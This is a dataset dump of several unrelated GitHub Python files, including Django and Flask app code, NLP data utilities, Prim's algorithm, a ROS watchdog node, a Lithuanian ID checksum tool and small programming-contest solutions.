print (\"no convolution\")\n return 0\n\n if screen.nx_add and screen.ny_add: #emittance switch on!!\n Pi, Sigma = emittance_on(screen)\n else:\n Pi = reshape(screen.Pi, (screen.ne, screen.nx*screen.ny))\n\n Sigma = reshape(screen.Sigma, (screen.ne, screen.nx*screen.ny))\n #print \"shape = \", shape(Pi)\n if screen.ne_add:\n print (\"energy spread on\")\n spread_on(screen, Pi,Sigma)\n #plot3D_data(screen.Total, screen.Xph, screen.Yph)\n #plt.show()\n return 0\n screen.Pi = reshape(Pi,shape(Pi)[0]*shape(Pi)[1]*shape(Pi)[2])\n screen.Sigma = reshape(Sigma,shape(Sigma)[0]*shape(Sigma)[1]*shape(Sigma)[2])\n screen.Total = screen.Pi + screen.Sigma\n \"\"\"\n else:\n if shape(Pi)[1] == 1 and shape(Pi)[2] == 1:\n screen.Pi = reshape(Pi,shape(Pi)[0])\n screen.Sigma = reshape(Sigma,shape(Sigma)[0])\n else:\n screen.Pi = array(Pi)\n screen.Sigma = array(Sigma)\n screen.Total = screen.Pi + screen.Sigma\n \"\"\"\n #print \"Total = \", shape(screen.Total)\nif __name__ == \"__main__\":\n from radiation.em_screen import EMScreen\n from classes.screen import Screen\n screen = Screen()\n screen.fund_harm_eV = 8200\n screen.z = 300.\n screen.x = 0.00\n\n screen.size_x = 0.003\n screen.size_y = 0.003\n screen.nx = 1\n screen.ny = 11\n screen.start_energy = 8000\n screen.end_energy = 8400\n screen.num_energy = 1\n em_screen = EMScreen(screen)\n from classes.beam import Beam\n beam = Beam()\n beam = Beam(x=0.,xp=-0.000115*0.,y=0,yp=0)\n beam.E = 17.5\n beam.sigma_E = 0.00*17.5\n beam.Q = 0.001\n beam.emit_x = 1.752e-11\n beam.emit_y = 1.752e-10\n beam.beta_x = 33.7\n beam.beta_y = 23.218\n beam.alpha_x = 1.219\n beam.alpha_y = -0.842\n print (em_screen.nx, em_screen.x_start, em_screen.x_step)\n print (em_screen.ny, em_screen.y_start, em_screen.y_step)\n print (em_screen.ne, em_screen.e_start, em_screen.e_step)\n change_sizes_screen(em_screen, beam)\n print (em_screen.nx, em_screen.x_start, em_screen.x_step, em_screen.nx_add)\n print (em_screen.ny, em_screen.y_start, em_screen.y_step, em_screen.ny_add)\n print (em_screen.ne, em_screen.e_start, em_screen.e_step, em_screen.ne_add)\n","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/lib/genera/src/python/radiation/emitt_spread.py","file_name":"emitt_spread.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"39037709029","text":"from django.urls import path\nfrom apps.libro.views import listLibros, libroCreate, libroDelete, libroUpdate\n\napp_name= 'libros'\nurlpatterns = [\n path('', listLibros, name= 'listlibros'),\n path('nuevo/', libroCreate, name= 'libroCreate'),\n path('actualizar//', libroUpdate, name= 'libroUpdate'),\n path('eeliminar//', libroDelete, name= 'libroDelete'),\n]","repo_name":"ACAMARGO97/taller_3corte","sub_path":"apps/libro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37186125539","text":"import json\nencodes = 0\nliterals = 0\nwith open('input.txt') as input:\n for line in input:\n line = line.replace('\\n', '')\n literals += len(line)\n encoded = json.dumps(line)\n encodes += len(encoded)\nprint(encodes - literals)\n","repo_name":"gla3dr/Advent-of-Code","sub_path":"2015/Day8/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19389273796","text":"import numpy as 
np\n\n\nclass CoNLLDataset(object):\n\n def __init__(self, filename, processing_word=None, processing_tag=None):\n self.filename = filename\n self.processing_word = processing_word\n self.processing_tag = processing_tag\n self.length = None\n self.file_stream = None\n\n def __iter__(self):\n return self\n\n def __len__(self):\n if self.length is None:\n self.length = 0\n for _ in self:\n self.length += 1\n\n return self.length\n\n def __next__(self):\n if self.file_stream is None:\n self.rest_stream()\n return self.__next_sentence()\n\n def __next_sentence(self):\n words, tags = [], []\n while True:\n\n try:\n line = next(self.file_stream)\n except Exception as e:\n if len(words) != 0:\n return words, tags\n\n self.rest_stream()\n raise e\n\n line = line.strip()\n\n if len(line) == 0 or line.startswith(\"-DOCSTART-\"):\n if len(words) != 0:\n return words, tags\n else:\n line_words = line.split(' ')\n\n words += [self.processing_word(line_words[0]) if self.processing_word is not None else line_words[0]]\n tags += [self.processing_tag(line_words[1]) if self.processing_tag is not None else line_words[1]]\n\n def rest_stream(self):\n if self.file_stream is not None:\n self.file_stream.close()\n self.file_stream = open(self.filename)\n\n def make_vocab(self):\n vocab_words = set()\n vocab_tags = set()\n vocab_chars = set()\n for words, tags in self:\n vocab_words.update(words)\n vocab_tags.update(tags)\n\n for word in vocab_words:\n vocab_chars.update(word)\n\n self.rest_stream()\n\n return vocab_words, vocab_tags, vocab_chars\n\n @staticmethod\n def load_vocab(filename):\n try:\n dictionary = dict()\n with open(filename) as f:\n for idx, word in enumerate(f):\n word = word.strip()\n dictionary[word] = idx\n\n except IOError:\n raise Exception(\"Unable to locate file {}\".format(filename))\n return dictionary\n\n @staticmethod\n def write_vocab(vocab, filename):\n with open(filename, \"w\") as f:\n f.write('\\n'.join(vocab))\n\n\nUNK = \"$UNK$\"\nNUM = \"$NUM$\"\nNONE = \"O\"\n\n\ndef standard_processing(word):\n if word.isdigit():\n word = NUM\n\n return word\n\n\ndef lowercase_processing(word):\n word = standard_processing(word.lower())\n\n return word\n\n\ndef word_processing(vocab_words, vocab_chars):\n def processing(word):\n\n char_ids = []\n for char in word:\n # ignore chars out of vocabulary\n if char in vocab_chars:\n char_ids += [vocab_chars[char]]\n\n word = lowercase_processing(word)\n\n if word in vocab_words:\n word = vocab_words[word]\n else:\n word = vocab_words[UNK]\n\n return char_ids, word\n\n return processing\n\n\ndef tag_processing(vocab_tags):\n def processing(word):\n\n word = standard_processing(word)\n\n if word in vocab_tags:\n word = vocab_tags[word]\n else:\n word = vocab_tags[UNK]\n\n return word\n\n return processing\n\n\ndef export_glove_train(vocab, glove_filename, trimmed_filename, dim):\n embeddings = np.zeros([len(vocab), dim])\n with open(glove_filename) as f:\n for line in f:\n line = line.strip().split(' ')\n word = line[0]\n embedding = [float(x) for x in line[1:]]\n if word in vocab:\n word_idx = vocab[word]\n embeddings[word_idx] = np.asarray(embedding)\n\n np.savez_compressed(trimmed_filename, embeddings=embeddings)\n\n\ndef load_glove_train(trimmed_filename):\n try:\n with np.load(trimmed_filename) as data:\n return data[\"embeddings\"]\n\n except IOError:\n raise Exception(\"Unable to locate file {}\".format(trimmed_filename))\n\n\ndef minibatches(data, minibatch_size):\n words_batch, label_batch = [], []\n for (word, label) in data:\n if 
len(words_batch) == minibatch_size:\n yield words_batch, label_batch\n words_batch, label_batch = [], []\n\n words_batch += [zip(*word)]\n label_batch += [label]\n\n if len(words_batch) != 0:\n yield words_batch, label_batch\n\n\ndef fill_array(arr, max_length):\n return list(arr)[:max_length] + [0] * (max_length - len(arr))\n\n\ndef pad_sequences(sequences, sequences_length=None):\n sequences_length = max(\n map(lambda x: len(x) if type(x) is not int else 0, sequences)) if sequences_length is None else sequences_length\n\n seqs = []\n lengths = []\n for sequence in sequences:\n\n seq = fill_array(sequence if type(sequence) is not int else [sequence], sequences_length)\n length = len(sequence) if type(sequence) is not int else 0\n\n if type(sequence) is not int and type(sequence[0]) == list:\n max_length_word = max([max(map(lambda x: len(x), _seq)) for _seq in sequences])\n\n # seq = list(map(lambda x: [x] if type(x) == int else x, seq))\n seq, length = pad_sequences(seq, max_length_word)\n\n lengths += [length]\n seqs += [seq]\n\n return seqs, lengths\n\n\ndef get_chunks(seq, tags):\n chunks = []\n for i, label_id in enumerate(seq):\n if len(chunks) != 0 and chunks[-1][0] == label_id:\n chunks[-1][2] += 1\n else:\n chunks.append([label_id, i, i + 1])\n\n return list(map(lambda x: tuple(x), chunks))\n","repo_name":"Inonut/text-processing","sub_path":"util/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74739621929","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom roomallocation.models import RoomAllocation\n\n\nclass RoomAllocationSerializer(serializers.ModelSerializer):\n class Meta:\n model = RoomAllocation\n fields = '__all__'\n depth = 4\n\n @staticmethod\n def setup_eager_loading(queryset):\n queryset = queryset.select_related(\n 'student',\n 'student__user',\n 'student__major',\n 'student__major__dept',\n 'student__major__dept__college',\n 'student__level',\n 'student__mode_of_entry',\n 'room',\n 'session',\n 'allocated_by',\n 'allocated_by__user',\n )\n return queryset\n\n\nclass RoomAllocationCreateSerializer(serializers.ModelSerializer):\n class Meta:\n validators = [\n UniqueTogetherValidator(\n queryset=RoomAllocation.objects.all(),\n fields=('student', 'session')\n )\n ]\n model = RoomAllocation\n fields = '__all__'\n","repo_name":"GHostEater/Portal","sub_path":"roomallocation/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352484217","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Prim's algorithm for the minimum spanning tree; the graph is represented by an adjacency matrix\n\nINF = 65535\n\nclass Graph(object):\n def __init__(self, vsize):\n self.vsize = vsize\n # adjacency matrix\n self.matrix = [[0 for x in range(vsize)] for _ in range(vsize)]\n\n def echo(self, parent):\n print(\"Edge \\tWeight\")\n for i in range(1, self.vsize):\n print(parent[i],\"-\",i,\"\\t\",self.matrix[i][parent[i]])\n\n def mindist(self, distance, visit):\n mindistance = INF\n u = -1\n for v in range(self.vsize):\n if distance[v] < mindistance and not visit[v]:\n mindistance = distance[v]\n u = v\n return u\n\n def prim(self):\n # initial distances are infinite\n distance = [INF]*self.vsize\n # pick the first node as the starting point\n distance[0] = 0\n # whether each node has been visited\n visit = [False]*self.vsize\n # parent of each node in the spanning tree\n parent = [None]*self.vsize\n parent[0] = -1\n\n for i in 
range(self.vsize):\n u = self.mindist(distance, visit)\n visit[u] = True\n\n # look for the next node, picking the one with the smallest distance\n for v in range(self.vsize):\n # self.matrix[u][v] > 0 : > 0 ensures the node is connected to the currently selected node\n if self.matrix[u][v] > 0 and distance[v] > self.matrix[u][v] and not visit[v]:\n distance[v] = self.matrix[u][v]\n parent[v] = u\n self.echo(parent)\n\ng = Graph(5)\ng.matrix = [ [0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0],\n ]\n \ng.prim()\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"graph/Prim.py","file_name":"Prim.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"71007960169","text":"from app import db, base_func\nimport redis\nimport rq.exceptions\nfrom passlib.hash import sha256_crypt\nfrom flask import current_app\n\nassociation_users_roles = db.Table(\n 'association_users_roles',\n db.Column('student_id', db.Integer, db.ForeignKey('users.id')),\n db.Column('teacher_id', db.Integer, db.ForeignKey('users.id'))\n)\nassociation_users_subject = db.Table('subjects_mtm',\n db.Column('user_id', db.Integer, db.ForeignKey('users.id'), primary_key=True),\n db.Column('subjects_id', db.Integer, db.ForeignKey('subjects.id'), primary_key=True)\n)\nassociation_users_scheduling = db.Table('users_scheduling_mtm',\n db.Column('user_id', db.Integer, db.ForeignKey('users.id'), primary_key=True),\n db.Column('scheduling_id', db.Integer, db.ForeignKey('schedulings.id'), primary_key=True)\n)\n\n\nclass User(db.Model, base_func.BaseFuncs):\n __tablename__ = 'users'\n\n id = db.Column(db.Integer, primary_key=True)\n telegram_id = db.Column(db.Integer)\n email = db.Column(db.String(), unique=True)\n password = db.Column(db.String(128))\n phone_number = db.Column(db.String())\n full_name = db.Column(db.String())\n is_teacher = db.Column(db.Boolean, default=False)\n tasks = db.relationship('Task', backref='user', lazy='dynamic')\n lesson_date = db.relationship(\n \"Scheduling\", secondary=association_users_scheduling,\n lazy=\"dynamic\", backref=db.backref(\"users\", lazy='dynamic')\n )\n teachers = db.relationship(\n 'User', secondary=association_users_roles,\n primaryjoin=(association_users_roles.c.teacher_id == id),\n secondaryjoin=(association_users_roles.c.student_id == id),\n backref=db.backref('students', lazy='dynamic'), lazy='dynamic')\n subjects = db.relationship(\n \"Subject\", secondary=association_users_subject,\n lazy=\"dynamic\", backref=db.backref(\"users\", lazy='dynamic')\n )\n\n def check_password_hash(self, password):\n return sha256_crypt.verify(password, self.password)\n\n def __init__(self, email=None, password='', telegram_id=None) -> None:\n self.email = email\n self.password = sha256_crypt.hash(password.strip())\n self.telegram_id = telegram_id\n\n def to_dict(self):\n if self.is_teacher:\n users = self.students\n else:\n users = self.teachers\n return dict(\n id=self.id, telegram_id=self.telegram_id, email=self.email,\n phone_number=self.phone_number, full_name=self.full_name,\n is_teacher=self.is_teacher,\n lesson_date=[lesson_time.to_dict()\n for lesson_time in self.lesson_date],\n subjects=[{'id': subject.id, 'title': subject.title}\n for subject in self.subjects],\n users=[{'id': user.id, 'telegram_id': user.telegram_id,\n 'full_name': user.full_name, 'is_teacher': user.is_teacher,\n 'email': user.email} for user in users]\n )\n\n def launch_task(self, name, description, *args, **kwargs):\n rq_job = 
current_app.task_queue.enqueue('app.tasks.' + name, self.id,\n *args, **kwargs)\n task = Task(id=rq_job.get_id(), name=name, description=description,\n user=self)\n db.session.add(task)\n return task\n\n def get_tasks_in_progress(self):\n return Task.query.filter_by(user=self, complete=False).all()\n\n def get_task_in_progress(self, name):\n return Task.query.filter_by(name=name, user=self,\n complete=False).first()\n\n def __repr__(self) -> str:\n return f'<{\"Teacher\" if self.is_teacher else \"Student\"}: {self.email}>'\n\n\nclass Subject(db.Model, base_func.BaseFuncs):\n __tablename__ = 'subjects'\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(), unique=True, nullable=False)\n description = db.Column(db.String())\n lesson_time = db.relationship(\"Scheduling\", backref=\"subject\", lazy='dynamic', cascade=\"all, delete\")\n\n def __init__(self, title: str, description=None) -> None:\n self.title = title.title()\n self.description = description or None\n\n def to_dict(self):\n return dict(\n id=self.id,\n title=self.title,\n description=self.description,\n lesson_time=[{'id': lesson_time.id, 'time': lesson_time.lesson_time, 'confirmation': lesson_time.confirmation, 'subject': lesson_time.subject.title} for lesson_time in self.lesson_time],\n users=[{'id': user.id, 'telegram_id': user.telegram_id, 'full_name': user.full_name, 'is_teacher': user.is_teacher, 'email': user.email} for user in self.users]\n )\n\n def __repr__(self) -> str:\n return f'<Subject {self.title}>'\n\n\nclass Scheduling(db.Model, base_func.BaseFuncs):\n __tablename__ = 'schedulings'\n\n id = db.Column(db.Integer, primary_key=True)\n confirmation = db.Column(db.Boolean, default=False)\n lesson_time = db.Column(db.DateTime)\n subject_id = db.Column(db.Integer, db.ForeignKey('subjects.id'))\n\n def to_dict(self):\n return dict(\n id=self.id,\n status=self.confirmation,\n time=self.lesson_time,\n subject=self.subject.title,\n users=[{\n 'id': user.id, 'telegram_id': user.telegram_id,\n 'full_name': user.full_name, 'is_teacher': user.is_teacher,\n 'email': user.email, 'phone_number': user.phone_number\n } for user in self.users]\n )\n\n def __repr__(self) -> str:\n return f'<Scheduling {self.lesson_time}>'\n\n\nclass Task(db.Model):\n id = db.Column(db.String(36), primary_key=True)\n name = db.Column(db.String(128), index=True)\n description = db.Column(db.String(128))\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n complete = db.Column(db.Boolean, default=False)\n\n def get_rq_job(self):\n try:\n rq_job = rq.job.Job.fetch(self.id, connection=current_app.redis)\n except (redis.exceptions.RedisError, rq.exceptions.NoSuchJobError):\n return None\n return rq_job\n\n def get_progress(self):\n job = self.get_rq_job()\n return job.meta.get('progress', 0) if job is not None else 100\n","repo_name":"besvova490/beetroot_project","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74949308007","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport sys\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist, Vector3\nimport time\n\ndef println(*data):\n\tprint(*data, file=sys.stderr)\n\ndef getTime():\n\treturn int(round(time.time() * 1000))\n\nstop = Twist(linear=Vector3(0.0, 0.0, 0.0))\nlastTime = getTime()\nlastEnableTime = 0\nmessage = stop\nenabled = False\ncanGoForwardCount = 0\nlastForwardTime = getTime()\n\ndef 
callback(data):\n\tglobal message\n\tglobal lastTime\n\tmessage = data\n\t# Nothing to see here\n\t# message.angular.z = -1.0 * message.angular.z\n\tlastTime = getTime()\n\ndef enabledCallback(data):\n\tglobal enabled\n\tglobal lastEnableTime\n\tif \"1\" in data.data:\n\t\tenabled = True\n\telse:\n\t\tenabled = False\n\tlastEnableTime = getTime()\n\ndef forwardCallback(data):\n\tglobal canGoForwardCount\n\tglobal lastForwardTime\n\tlastForwardTime = getTime()\n\tif \"1\" in data.data:\n\t\tcanGoForwardCount = min(canGoForwardCount + 1, 5)\n\telse:\n\t\tcanGoForwardCount = max(canGoForwardCount - 2, 0)\n\n\nrospy.init_node(\"watchdog\", anonymous=True)\nvelpub = rospy.Publisher(\"/jackal_velocity_controller/cmd_vel\", Twist, queue_size=10)\nvelsub = rospy.Subscriber(\"/cmd_vel\", Twist, callback)\nenablesub = rospy.Subscriber(\"/enabled\", String, enabledCallback)\nforwardsub = rospy.Subscriber(\"/forward\", String, forwardCallback)\n\nwhile not rospy.is_shutdown():\n\tprint(\"count: \", canGoForwardCount)\n\tif getTime() - lastForwardTime > 350 and message.linear.x > 0:\n\t\tmessage.linear.x = 0\n\telif canGoForwardCount <= 2 and message.linear.x > 0:\n\t\tmessage.linear.x = canGoForwardCount * message.linear.x / 4.0\n\n\tif getTime() - lastTime > 250 or not enabled or getTime() - lastEnableTime > 100:\n\t\tprint(\"STOPPING DUE TO TIMEOUT\")\n\t\tvelpub.publish(stop)\n\telse:\n\t\tvelpub.publish(message)\n","repo_name":"NVIDIA-AI-IOT/Foresee-Navigation","sub_path":"ros_workspace/src/robot_control/src/watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"53"} +{"seq_id":"4548428234","text":"def gauti_ak_kontrolini(kodas):\r\n kodas_str = str(kodas)\r\n A = int(kodas_str[0])\r\n B = int(kodas_str[1])\r\n C = int(kodas_str[2])\r\n D = int(kodas_str[3])\r\n E = int(kodas_str[4])\r\n F = int(kodas_str[5])\r\n G = int(kodas_str[6])\r\n H = int(kodas_str[7])\r\n I = int(kodas_str[8])\r\n J = int(kodas_str[9])\r\n S = A * 1 + B * 2 + C * 3 + D * 4 + E * 5 + F * 6 + G * 7 + H * 8 + I * 9 + J * 1\r\n if S % 11 != 10:\r\n kontrolinis = S % 11\r\n else:\r\n S = A * 3 + B * 4 + C * 5 + D * 6 + E * 7 + F * 8 + G * 9 + H * 1 + I * 2 + J * 3\r\n if S % 11 != 10:\r\n kontrolinis = S % 11\r\n else:\r\n kontrolinis = 0\r\n return kontrolinis\r\n\r\ndef ak_validavimas(kodas):\r\n K = int(str(kodas)[-1])\r\n return gauti_ak_kontrolini(kodas) == K\r\n\r\n\r\n# print(ak_validavimas(40204219251))\r\n# print(ak_validavimas(49508079556))\r\n\r\ndef ak_generavimas(lytis, data, eilesnr):\r\n data_split = data.split(\"-\")\r\n metai1 = data_split[0][:2]\r\n\r\n if lytis == \"vyras\":\r\n pirmas_skaicius = str((int(metai1) - 18) * 2 + 1)\r\n else:\r\n pirmas_skaicius = str((int(metai1) - 18) * 2 + 2)\r\n\r\n metai2 = data_split[0][2:]\r\n menuo = data_split[1]\r\n diena = data_split[2]\r\n be_paskutinio = pirmas_skaicius + metai2 + menuo + diena + eilesnr\r\n return int(be_paskutinio + str(gauti_ak_kontrolini(be_paskutinio)))\r\n\r\nprint(ak_generavimas(\"vyras\", \"2000-12-12\", \"045\"))\r\nprint(ak_generavimas(\"vyras\", \"2000-12-12\", \"512\"))\r\nprint(ak_generavimas(\"moteris\", \"1995-12-12\", \"500\"))\r\n\r\n","repo_name":"DonatasNoreika/python1lygis","sub_path":"Programos/Funkcijos/asmens_kodas.py","file_name":"asmens_kodas.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"lt","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} 
+{"seq_id":"42661674405","text":"from django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\nfrom django.template.loader import render_to_string\nfrom django.utils.functional import memoize\n\nfrom projects import constants\nfrom projects.utils import diff, dmp, safe_write\n\nfrom taggit.managers import TaggableManager\n\nimport os\nimport re\nimport fnmatch\n\n\nclass ProjectManager(models.Manager):\n def live(self, *args, **kwargs):\n base_qs = self.filter(status=constants.LIVE_STATUS)\n return base_qs.filter(*args, **kwargs)\n\n\nclass Project(models.Model):\n user = models.ForeignKey(User, related_name='projects')\n name = models.CharField(max_length=255)\n slug = models.SlugField()\n description = models.TextField(blank=True,\n help_text='restructuredtext description of the project')\n repo = models.CharField(max_length=100, blank=True,\n help_text='URL for your code (hg or git). Ex. http://github.com/ericholscher/django-kong.git')\n docs_directory = models.CharField(max_length=255, blank=True)\n project_url = models.URLField(blank=True, help_text='the project\\'s homepage')\n pub_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n version = models.CharField(max_length=100, blank=True,\n help_text='project version these docs apply to, i.e. 1.0a')\n copyright = models.CharField(max_length=255, blank=True,\n help_text='project copyright information')\n theme = models.CharField(max_length=20,\n choices=constants.DEFAULT_THEME_CHOICES, default=constants.THEME_DEFAULT,\n help_text='Examples')\n path = models.CharField(max_length=255, editable=False)\n suffix = models.CharField(max_length=10, editable=False, default='.rst')\n extensions = models.CharField(max_length=255, editable=False, default='')\n status = models.PositiveSmallIntegerField(choices=constants.STATUS_CHOICES,\n default=constants.LIVE_STATUS)\n\n tags = TaggableManager()\n\n objects = ProjectManager()\n\n class Meta:\n ordering = ('-modified_date', 'name')\n\n def __unicode__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('projects_detail', args=[self.user.username, self.slug])\n\n def get_docs_url(self):\n return reverse('docs_detail', args=[self.user.username, self.slug, ''])\n\n def get_doc_root(self):\n \"\"\"\n Return a user specified doc url.\n \"\"\"\n return os.path.join(\n settings.DOCROOT, # the root of the user builds .../user_build\n self.user.username, # docs are stored using the username as the\n self.slug, # docs are organized by project\n self.slug, # code is checked out here\n self.docs_directory # this is the directory where the docs live\n )\n\n @property\n def user_doc_path(self):\n return os.path.join(settings.DOCROOT, self.user.username, self.slug)\n #user_doc_path = property(memoize(user_doc_path, {}, 1))\n\n @property\n def full_doc_path(self):\n \"\"\"\n The path to the documentation root in the project.\n \"\"\"\n doc_base = os.path.join(self.user_doc_path, self.slug)\n for possible_path in ['docs', 'doc']:\n if os.path.exists(os.path.join(doc_base, '%s' % possible_path)):\n return os.path.join(doc_base, '%s' % possible_path)\n #No docs directory, assume a full docs checkout\n return doc_base\n #full_doc_path = property(memoize(full_doc_path, {}, 1))\n\n @property\n def full_html_path(self):\n \"\"\"\n The path to the build html docs in the project.\n \"\"\"\n doc_path = 
self.full_doc_path\n for pos_build in ['build', '_build', '.build']:\n if os.path.exists(os.path.join(doc_path, '%s/html' % pos_build)):\n return os.path.join(doc_path, '%s/html' % pos_build)\n\n #full_html_path = property(memoize(full_html_path, {}, 1))\n\n def find(self, file):\n \"\"\"\n A balla API to find files inside of a projects dir.\n \"\"\"\n matches = []\n for root, dirnames, filenames in os.walk(self.full_doc_path):\n for filename in fnmatch.filter(filenames, file):\n matches.append(os.path.join(root, filename))\n return matches\n\n find = memoize(find, {}, 2)\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super(Project, self).save(*args, **kwargs)\n\n @property\n def template_dir(self):\n return os.path.join(settings.SITE_ROOT, 'templates', 'sphinx')\n\n def get_index_filename(self):\n return os.path.join(self.path, 'index.rst')\n\n def get_rendered_index(self):\n return render_to_string('projects/index.rst.html', {'project': self})\n\n def write_index(self):\n if not self.is_imported:\n safe_write(self.get_index_filename(), self.get_rendered_index())\n\n @property\n def is_imported(self):\n return bool(self.repo)\n\n @property\n def repo_type(self):\n if self.is_imported:\n if re.match('(https?://|git://)github', self.repo):\n return 'git'\n elif self.repo.startswith('http://bitbucket'):\n return 'hg'\n elif self.repo.endswith('git'):\n return 'git'\n\n def get_latest_revisions(self):\n revision_qs = FileRevision.objects.filter(file__project=self,\n file__status=constants.LIVE_STATUS)\n return revision_qs.order_by('-created_date')\n\n def get_top_level_files(self):\n return self.files.live(parent__isnull=True).order_by('ordering')\n\n @property\n def conf_filename(self):\n return os.path.join(self.path, 'conf.py')\n\n def get_rendered_conf(self):\n return render_to_string('projects/conf.py.html', {'project': self})\n\n def write_to_disk(self):\n safe_write(self.conf_filename, self.get_rendered_conf())\n\n\nclass FileManager(models.Manager):\n def live(self, *args, **kwargs):\n base_qs = self.filter(status=constants.LIVE_STATUS)\n return base_qs.filter(*args, **kwargs)\n\n\nclass File(models.Model):\n project = models.ForeignKey(Project, related_name='files')\n parent = models.ForeignKey('self', null=True, blank=True, related_name='children')\n heading = models.CharField(max_length=255)\n slug = models.SlugField()\n content = models.TextField()\n denormalized_path = models.CharField(max_length=255, editable=False)\n ordering = models.PositiveSmallIntegerField(default=1)\n status = models.PositiveSmallIntegerField(choices=constants.STATUS_CHOICES,\n default=constants.LIVE_STATUS)\n\n objects = FileManager()\n\n class Meta:\n ordering = ('denormalized_path',)\n\n def __unicode__(self):\n return '%s: %s' % (self.project.name, self.heading)\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.heading)\n\n if self.parent:\n path = '%s/%s' % (self.parent.denormalized_path, self.slug)\n else:\n path = self.slug\n\n self.denormalized_path = path\n\n super(File, self).save(*args, **kwargs)\n\n if self.children:\n def update_children(children):\n for child in children:\n child.save()\n update_children(child.children.all())\n update_children(self.children.all())\n #Update modified time on project.\n self.project.save()\n\n @property\n def depth(self):\n return len(self.denormalized_path.split('/'))\n\n def create_revision(self, old_content, comment):\n FileRevision.objects.create(\n file=self,\n 
comment=comment,\n diff=diff(self.content, old_content)\n )\n\n @property\n def current_revision(self):\n return self.revisions.filter(is_reverted=False)[0]\n\n def get_html_diff(self, rev_from, rev_to):\n rev_from = self.revisions.get(revision_number=rev_from)\n rev_to = self.revisions.get(revision_number=rev_to)\n\n diffs = dmp.diff_main(rev_from.diff, rev_to.diff)\n return dmp.diff_prettyHtml(diffs)\n\n def revert_to(self, revision_number):\n revision = self.revisions.get(revision_number=revision_number)\n revision.apply()\n\n @property\n def filename(self):\n return os.path.join(\n self.project.path,\n '%s.rst' % self.denormalized_path\n )\n\n def get_rendered(self):\n return render_to_string('projects/doc_file.rst.html', {'file': self})\n\n def write_to_disk(self):\n safe_write(self.filename, self.get_rendered())\n\n\nclass FileRevision(models.Model):\n file = models.ForeignKey(File, related_name='revisions')\n comment = models.TextField(blank=True)\n diff = models.TextField(blank=True)\n created_date = models.DateTimeField(auto_now_add=True)\n\n revision_number = models.IntegerField()\n is_reverted = models.BooleanField(default=False)\n\n class Meta:\n ordering = ('-revision_number',)\n\n def __unicode__(self):\n return self.comment or '%s #%s' % (self.file.heading, self.revision_number)\n\n def get_file_content(self):\n \"\"\"\n Apply the series of diffs after this revision in reverse order,\n bringing the content back to the state it was in this revision\n \"\"\"\n after = self.file.revisions.filter(revision_number__gt=self.revision_number)\n content = self.file.content\n\n for revision in after:\n patch = dmp.patch_fromText(revision.diff)\n content = dmp.patch_apply(patch, content)[0]\n\n return content\n\n def apply(self):\n original_content = self.file.content\n\n # store the old content on the file\n self.file.content = self.get_file_content()\n self.file.save()\n\n # mark reverted changesets\n reverted_qs = self.file.revisions.filter(revision_number__gt=self.revision_number)\n reverted_qs.update(is_reverted=True)\n\n # create a new revision\n FileRevision.objects.create(\n file=self.file,\n comment='Reverted to #%s' % self.revision_number,\n diff=diff(self.file.content, original_content)\n )\n\n def save(self, *args, **kwargs):\n if not self.pk:\n max_rev = self.file.revisions.aggregate(max=models.Max('revision_number'))\n if max_rev['max'] is None:\n self.revision_number = 1\n else:\n self.revision_number = max_rev['max'] + 1\n super(FileRevision, self).save(*args, **kwargs)\n","repo_name":"chrisdickinson/tweezers","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19742121098","text":"t = int(input())\nfor _ in range(t):\n ll1 = []\n ll2 = []\n s = input()\n l = len(s)\n for i in range(l):\n if s[i] == '<':\n if ll1:\n ll2.append(ll1.pop())\n elif s[i] == '>':\n if ll2:\n ll1.append(ll2.pop())\n elif s[i] == '-':\n if ll1:\n ll1.pop()\n else:\n ll1.append(s[i])\n \n ll1.extend(reversed(ll2))\n answer = ''.join(ll1)\n print(answer)","repo_name":"SeongrokKim/python-practice","sub_path":"backjoon/코딩테스트 